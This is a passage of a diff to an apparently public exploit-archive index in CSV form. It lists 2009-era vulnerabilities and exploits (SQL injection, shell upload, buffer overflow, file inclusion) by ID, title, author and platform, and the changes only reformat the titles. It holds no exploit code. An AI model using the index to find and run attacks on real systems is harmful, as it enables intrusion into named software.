Vulnerability",2009-11-26,DigitALL,php,webapps,0 10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability",2000-06-01,netsec,hardware,dos,80 -10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability",2009-11-28,kaMtiEz,php,webapps,0 +10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - Remote SQL Injection Vulnerability",2009-11-28,kaMtiEz,php,webapps,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 pls Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability",2009-11-28,DigitALL,php,webapps,0 10242,platforms/php/webapps/10242.txt,"PHP ""multipart/form-data"" Denial of Service Exploit (Python)",2009-11-27,Eren,php,webapps,0 @@ -9551,7 +9551,7 @@ id,file,description,date,author,platform,type,port 10259,platforms/php/webapps/10259.txt,"Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability",2009-12-01,"cr4wl3r ",php,webapps,0 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MYSQL Scripts Admin Bypass",2009-12-01,DUNDEE,php,webapps,0 10261,platforms/linux/webapps/10261.txt,"Dotdefender Remote Command Execution 3.8-5",2009-12-01,"John Dos",linux,webapps,80 -10262,platforms/linux/webapps/10262.txt,"ISPworker <= 1.23 Remote File Disclosure exploit",2009-12-01,"cr4wl3r ",linux,webapps,80 +10262,platforms/linux/webapps/10262.txt,"ISPworker <= 1.23 - Remote File Disclosure Exploit",2009-12-01,"cr4wl3r ",linux,webapps,80 10263,platforms/linux/webapps/10263.txt,"quate cms <= 0.3.5 (rfi/lfi) Multiple Vulnerabilities",2009-12-01,"cr4wl3r ",linux,webapps,80 10264,platforms/multiple/local/10264.txt,"Oracle SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10265,platforms/multiple/local/10265.txt,"Oracle SYS.LT.COMPRESSWORKSPACETREE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 @@ -9577,7 +9577,7 @@ id,file,description,date,author,platform,type,port 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0 10291,platforms/php/webapps/10291.txt,"Joomla! ProofReader Component 1.0 RC6 Cross-Site Scripting Vulnerability",2009-12-01,MustLive,php,webapps,0 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability",2009-12-01,MustLive,multiple,webapps,0 -10293,platforms/php/webapps/10293.txt,"PHP-Nuke <= 8.0 XSS & HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 +10293,platforms/php/webapps/10293.txt,"PHP-Nuke <= 8.0 - XSS & HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion Vulnerability",2009-11-24,"Don Tukulesto",php,webapps,0 10295,platforms/windows/local/10295.txt,"DAZ Studio Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0 10296,platforms/php/local/10296.txt,"PHP 'ini_restore()' Memory Information Disclosure Vulnerability",2009-12-03,"Maksymilian Arciemowicz",php,local,0 @@ -9587,7 +9587,7 @@ id,file,description,date,author,platform,type,port 10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb <= 2.3.2 - SQL Injection Exploit",2009-12-04,"cr4wl3r ",php,webapps,0 10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0 10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4 LFI and <= 3.0.4 and <= 2.3.6 - SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 -10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 Multiple File Inclusion Vulnerabilities",2009-12-04,R3VAN_BASTARD,php,webapps,0 +10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 - Multiple File Inclusion Vulnerabilities",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 10312,platforms/php/webapps/10312.php,"Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter",2009-12-04,Jbyte,php,webapps,0 @@ -9597,7 +9597,7 @@ id,file,description,date,author,platform,type,port 10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 -10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 +10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0 @@ -9611,22 +9611,22 @@ id,file,description,date,author,platform,type,port 10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)",2009-12-07,loneferret,windows,local,0 10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter Persistant XSS Vulnerability",2009-12-07,mr_me,php,webapps,0 -10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption 0day PoC",2009-12-07,"Jeremy Brown",linux,dos,0 -10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow 0day Exploit",2009-12-07,"Jeremy Brown",windows,local,0 +10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC (0day)",2009-12-07,"Jeremy Brown",linux,dos,0 +10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0day)",2009-12-07,"Jeremy Brown",windows,local,0 10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 -10341,platforms/php/webapps/10341.txt,"SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 +10341,platforms/php/webapps/10341.txt,"SiSplet CMS <= 2008-01-24 - Multiple Remote File Include Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (meta)",2009-12-07,dookie,windows,local,0 10345,platforms/windows/local/10345.py,"gAlan (.galan file) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 Universal Buffer Overflow Exploit (meta)",2009-12-07,loneferret,windows,local,0 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0 -10349,platforms/linux/dos/10349.py,"CoreHTTP web server off-by-one buffer overflow vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80 +10349,platforms/linux/dos/10349.py,"CoreHTTP web server off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection Vulnerability",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI, RFI, and XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0 10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0 10353,platforms/windows/local/10353.pl,"Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)",2009-09-24,germaya_x,windows,local,0 -10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold persistant XSS vulnerability",2009-12-08,mr_me,php,webapps,0 -10356,platforms/php/webapps/10356.txt,"Joomla Component com_job (showMoreUse) SQL injection vulnerability",2009-12-08,Palyo34,php,webapps,0 +10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold persistant XSS Vulnerability",2009-12-08,mr_me,php,webapps,0 +10356,platforms/php/webapps/10356.txt,"Joomla Component com_job (showMoreUse) SQL Injection Vulnerability",2009-12-08,Palyo34,php,webapps,0 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - (.pls) Universal Local BoF Exploit",2009-12-09,mr_me,windows,local,0 @@ -9638,7 +9638,7 @@ id,file,description,date,author,platform,type,port 10366,platforms/php/webapps/10366.txt,"Joomla Component com_jsjobs 1.0.5.6 - SQL Injection Vulnerabilities",2009-12-10,kaMtiEz,php,webapps,0 10367,platforms/php/webapps/10367.txt,"Joomla Component com_jphoto SQL Injection Vulnerability - (id)",2009-12-10,kaMtiEz,php,webapps,0 10368,platforms/asp/webapps/10368.txt,"Free ASP Upload Shell Upload Vulnerability",2009-12-10,Mr.aFiR,asp,webapps,0 -10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 Remote File Include Vulneralbility",2009-12-10,"Don Tukulesto",php,webapps,0 +10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 - Remote File Include Vulneralbility",2009-12-10,"Don Tukulesto",php,webapps,0 10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote (Auth Bypass) SQL Injection Vulnerabiity",2009-12-10,mr_me,php,webapps,0 10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH)",2009-12-10,germaya_x,windows,local,0 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL/XPath injectio",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0 @@ -9649,10 +9649,10 @@ id,file,description,date,author,platform,type,port 10377,platforms/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code Vulnerability",2009-11-18,"Core Security",windows,dos,2315 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 10379,platforms/php/webapps/10379.txt,"oBlog - Persistant XSS, CSRF, Admin Bruteforce",2009-12-11,"Milos Zivanovic ",php,webapps,0 -10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun (code execution) 0day",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 +10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution (0day)",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 10383,platforms/php/webapps/10383.txt,"Digital Scribe 1.4.1 - Multiple SQL Injection Vulnerabilities",2009-12-11,"Salvatore Fresta",php,webapps,0 10384,platforms/php/webapps/10384.txt,"E-Store SQL Injection Vulnerability",2009-12-11,"Salvatore Fresta",php,webapps,0 -10386,platforms/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 Multiple XSS",2005-05-07,"Thomas Liam Romanis",solaris,webapps,0 +10386,platforms/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 - Multiple XSS",2005-05-07,"Thomas Liam Romanis",solaris,webapps,0 10388,platforms/php/webapps/10388.txt,"Chipmunk Newsletter CSRF Vulnerabilities",2009-12-11,"Milos Zivanovic ",php,webapps,0 10389,platforms/php/webapps/10389.txt,"Illogator Shop SQL Injection Bypass",2009-12-11,bi0,php,webapps,0 10390,platforms/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities",2009-12-11,"Salvatore Fresta",php,webapps,0 @@ -9677,10 +9677,10 @@ id,file,description,date,author,platform,type,port 10418,platforms/php/webapps/10418.txt,"Ele Medios CMS SQL Injection Vulnerability",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple CSRF Vulnerabilities",2009-12-13,"Milos Zivanovic ",php,webapps,0 10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 -10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 -10422,platforms/php/webapps/10422.txt,"eoCMS <= 0.9.03 Remote FIle Include Vulnerability",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 -10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1 - (.M3U File) Stack Overflow exploit",2009-12-14,"Vinod Sharma",windows,local,0 -10424,platforms/multiple/webapps/10424.txt,"Redmine <= 0.8.6 CSRF Add Admin User Exploit",2009-12-14,p0deje,multiple,webapps,0 +10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple RFI Vulnerability",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 +10422,platforms/php/webapps/10422.txt,"eoCMS <= 0.9.03 - Remote FIle Include Vulnerability",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 +10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1 - (.M3U File) Stack Overflow Exploit",2009-12-14,"Vinod Sharma",windows,local,0 +10424,platforms/multiple/webapps/10424.txt,"Redmine <= 0.8.6 - CSRF Add Admin User Exploit",2009-12-14,p0deje,multiple,webapps,0 10425,platforms/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Auth Bypass",2009-12-14,Mr.aFiR,asp,webapps,0 10426,platforms/linux/webapps/10426.txt,"[WS] upload Remote File Upload Vulnerability",2009-12-14,"ViRuSMaN ",linux,webapps,80 10427,platforms/linux/webapps/10427.txt,"DigitalHive Multiple Vulnerabilities",2009-12-14,"ViRuSMaN ",linux,webapps,80 @@ -9708,7 +9708,7 @@ id,file,description,date,author,platform,type,port 10452,platforms/php/webapps/10452.txt,"Ez News Manager / Pro CSRF Change Admin Password",2009-12-15,"Milos Zivanovic ",php,webapps,0 10453,platforms/php/webapps/10453.txt,"SitioOnline SQL Injection Vulnerability",2009-12-15,4lG3r14n0-t3r0,php,webapps,0 10454,platforms/php/webapps/10454.txt,"Ez Faq Maker Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 -10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm Cms <= 1.0 - (PageId) Remote SQL Injection Vulnerability",2009-12-15,Red-D3v1L,asp,webapps,0 +10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm CMS <= 1.0 - (PageId) Remote SQL Injection Vulnerability",2009-12-15,Red-D3v1L,asp,webapps,0 10456,platforms/asp/webapps/10456.txt,"ClickTrackerASP(sitedetails.asp siteid) SQL Injection Vulnerability",2009-12-15,R3d-D3V!L,asp,webapps,0 10457,platforms/asp/webapps/10457.txt,"LinkPal 1.0 - SQL Injection Vulnerability",2009-12-15,R3d-D3V!L,asp,webapps,0 10458,platforms/php/webapps/10458.txt,"Ez Blog 1.0 - XSS/CSRF Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 @@ -9725,7 +9725,7 @@ id,file,description,date,author,platform,type,port 10474,platforms/php/webapps/10474.txt,"Article Directory SQL Injection Vulnerability",2009-12-16,R3d-D3V!L,php,webapps,0 10475,platforms/windows/local/10475.txt,"QuickHeal antivirus 2010 Local Privilege Escalation",2009-12-16,"Francis Provencher",windows,local,0 10476,platforms/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection Vulnerability",2009-12-16,R3d-D3V!L,asp,webapps,0 -10478,platforms/php/webapps/10478.txt,"iSupport <= 1.8 XSS/LFI Exploit",2009-12-16,"Stink and Essandre",php,webapps,0 +10478,platforms/php/webapps/10478.txt,"iSupport <= 1.8 - XSS/LFI Exploit",2009-12-16,"Stink and Essandre",php,webapps,0 10479,platforms/php/webapps/10479.txt,"OSSIM 2.1.5 - SQL Injection Vulnerability",2009-12-16,"Nahuel Grisolia",php,webapps,0 10480,platforms/php/webapps/10480.txt,"OSSIM 2.1.5 - Remote Command Execution",2009-12-16,"Nahuel Grisolia",php,webapps,0 10481,platforms/php/webapps/10481.txt,"OSSIM 2.1.5 - Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",php,webapps,0 @@ -9733,11 +9733,11 @@ id,file,description,date,author,platform,type,port 10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script Remote Database Disclosure Vulnerability",2009-12-16,"ViRuSMaN ",asp,webapps,0 10484,platforms/windows/local/10484.txt,"Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability",2009-12-16,"Maxim A. Kulakov",windows,local,0 10485,platforms/php/webapps/10485.txt,"Drupal Sections Module XSS Vulnerability",2009-12-16,"Justin C. Klein Keane",php,webapps,0 -10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 vccleaner root vulnerability",2009-12-16,"Dominick LaTrappe",linux,local,0 +10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 vccleaner root Vulnerability",2009-12-16,"Dominick LaTrappe",linux,local,0 10488,platforms/php/webapps/10488.txt,"WP-Forum <= 2.3 - SQL Injection & Blind SQL Injection vulnerabilities",2009-12-16,"Juan Galiana Lara",php,webapps,0 10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local DoS Buffer Overflow",2009-12-16,Connection,windows,dos,0 10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System (auth bypass) SQL Injection Vulnerability",2009-12-16,R3d-D3V!L,php,webapps,0 -10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS sql Injection Vulnerability",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS SQL Injection Vulnerability",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 SQL Injection Vulnerability",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - XSS/Upload Vulerability",2009-12-16,Stink',php,webapps,0 10496,platforms/asp/webapps/10496.txt,"freekot (auth bypass) SQL Injection Vulnerability",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -9753,7 +9753,7 @@ id,file,description,date,author,platform,type,port 10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection Vulnerability",2009-12-17,R3d-D3V!L,asp,webapps,0 10510,platforms/hardware/remote/10510.txt,"Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload Shell Upload Vulnerability",2009-12-17,"wlhaan hacker",php,webapps,0 -10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - ""PHP_SELF"" XSS vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 +10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - ""PHP_SELF"" XSS Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication bypass and File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 10514,platforms/windows/webapps/10514.txt,"dblog (dblog.mdb) Remote Database Disclosure Vulnerability",2009-12-17,"AnTi SeCuRe",windows,webapps,0 10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 Add Admin Exploit",2009-12-17,RENO,php,webapps,0 @@ -9771,9 +9771,9 @@ id,file,description,date,author,platform,type,port 10531,platforms/php/webapps/10531.txt,"jCore CMS Cross Site Scripting Vulnerability",2009-12-17,loneferret,php,webapps,0 10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart Remote Code Execution Vulnerability",2009-12-17,"Braeden Thomas",php,webapps,0 10533,platforms/php/webapps/10533.txt,"VirtueMart 'product_id' Parameter SQL Injection Vulnerability",2009-12-17,Neo-GabrieL,php,webapps,0 -10534,platforms/php/webapps/10534.txt,"Rumba XML suffers from a cross site scripting vulnerability",2009-12-17,"Hadi Kiamarsi",php,webapps,0 +10534,platforms/php/webapps/10534.txt,"Rumba XML suffers from a cross site scripting Vulnerability",2009-12-17,"Hadi Kiamarsi",php,webapps,0 10535,platforms/php/webapps/10535.txt,"WordPress and Pyrmont 2.x - SQL Injection Vulnerability",2009-12-18,Gamoscu,php,webapps,0 -10537,platforms/php/webapps/10537.txt,"gpEasy <= 1.5RC3 Remote FIle Include Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 +10537,platforms/php/webapps/10537.txt,"gpEasy <= 1.5RC3 - Remote FIle Include Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 10540,platforms/asp/webapps/10540.txt,"E-Smartcart Remote SQL Injection Vulnerability",2009-12-18,R3d-D3V!L,asp,webapps,0 10542,platforms/windows/remote/10542.py,"TFTP Server for Windows 1.4 - Buffer Overflow Remote Exploit (#2)",2009-12-18,Molotov,windows,remote,69 10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS SQL Injection Vulnerability",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -9796,17 +9796,17 @@ id,file,description,date,author,platform,type,port 10563,platforms/windows/local/10563.py,"PlayMeNow Malformed M3U Playlist WinXP Universal BOF",2009-12-19,loneferret,windows,local,0 10564,platforms/php/webapps/10564.txt,"SaurusCMS <= 4.6.4 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0 -10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 (Auth Bypass) SQL injection Vulnerability",2009-12-20,PaL-D3v1L,php,webapps,0 +10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-12-20,PaL-D3v1L,php,webapps,0 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Remote File Upload Vulnerability",2009-12-20,"Master Mind",php,webapps,0 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-12-20,cOndemned,php,webapps,0 -10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Z0D Vulnerability",2009-12-20,Global-Evolution,php,webapps,0 -10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS vulnerability",2009-12-20,K053,php,webapps,0 +10570,platforms/php/webapps/10570.txt,"Pandora Fms Monitoring Z0D Vulnerability",2009-12-20,Global-Evolution,php,webapps,0 +10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS Vulnerability",2009-12-20,K053,php,webapps,0 10572,platforms/php/webapps/10572.txt,"4images 1.7.1 - Remote SQL Injection Vulnerability",2009-12-20,"Master Mind",php,webapps,0 10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. Database Disclosure Vulnerability",2009-12-20,LionTurk,asp,webapps,0 10574,platforms/php/webapps/10574.txt,"phUploader 2 - Remote File Upload Vulnerability",2009-12-20,wlhaan-hacker,php,webapps,0 10575,platforms/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection Exploit",2009-12-21,Sora,php,webapps,0 10576,platforms/asp/webapps/10576.txt,"Angelo-emlak 1.0 - Database Disclosure Vulnerability",2009-12-21,LionTurk,asp,webapps,0 -10577,platforms/windows/local/10577.pl,"PlayMeNow Malformed M3U Playlist Buffer Overflow(SEH)",2009-12-21,"ThE g0bL!N",windows,local,0 +10577,platforms/windows/local/10577.pl,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (SEH)",2009-12-21,"ThE g0bL!N",windows,local,0 10578,platforms/php/webapps/10578.txt,"Ultimate Uploader 1.3 - Remote File Upload Vulnerability",2009-12-21,"Master Mind",php,webapps,0 10579,platforms/multiple/remote/10579.py,"TLS Renegotiation Vulnerability PoC",2009-12-21,"RedTeam Pentesting",multiple,remote,0 10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers DoS (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 @@ -9848,7 +9848,7 @@ id,file,description,date,author,platform,type,port 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman Cross Site Scripting Vulnerability",2009-12-24,FL0RiX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection SQL injection",2009-12-24,FL0RiX,php,webapps,0 10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 Admin Login Exploit",2009-12-24,Sora,php,webapps,0 -10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3",2009-12-24,d3b4g,windows,local,0 +10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 (.pls) Stack Buffer Overflow Exploit WinXP SP3",2009-12-24,d3b4g,windows,local,0 10629,platforms/php/webapps/10629.txt,"Traidnt Gallery add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 10632,platforms/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection Vulnerability",2009-12-24,molli,php,webapps,0 @@ -9923,7 +9923,7 @@ id,file,description,date,author,platform,type,port 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager (OmniInet.exe) Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 10717,platforms/php/webapps/10717.txt,"DBHCMS - Web Content Management System 1.1.4 - RFI Vulnerability",2009-12-26,Gamoscu,php,webapps,0 -10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script Arabic Version - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 +10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 10720,platforms/php/webapps/10720.txt,"PHP Football 1.0 - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 @@ -9937,7 +9937,7 @@ id,file,description,date,author,platform,type,port 10731,platforms/php/webapps/10731.txt,"joomla component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 10732,platforms/php/webapps/10732.txt,"PHP upload - (unijimpe) Remote File Upload Vulnerability",2009-12-27,"wlhaan hacker",php,webapps,0 10733,platforms/php/webapps/10733.txt,"com_webcamxp Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 -10734,platforms/php/webapps/10734.txt,"Joomla Component com_beeheard Blind SQL injection Vulnerability",2009-12-27,FL0RiX,php,webapps,0 +10734,platforms/php/webapps/10734.txt,"Joomla Component com_beeheard Blind SQL Injection Vulnerability",2009-12-27,FL0RiX,php,webapps,0 10735,platforms/php/webapps/10735.txt,"com_jm-recommend Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 10736,platforms/php/webapps/10736.txt,"lineaCMS Cross Site Scripting Vulnerability",2009-12-27,Phenom,php,webapps,0 10737,platforms/php/webapps/10737.txt,"Joomla Component com_facileforms Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 @@ -9961,7 +9961,7 @@ id,file,description,date,author,platform,type,port 10757,platforms/linux/webapps/10757.txt,"PHP Forum ohne My SQL Remote File Upload Vulnerability",2009-12-28,"wlhaan hacker",linux,webapps,80 10758,platforms/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection Vulnerability",2009-12-28,BAYBORA,php,webapps,0 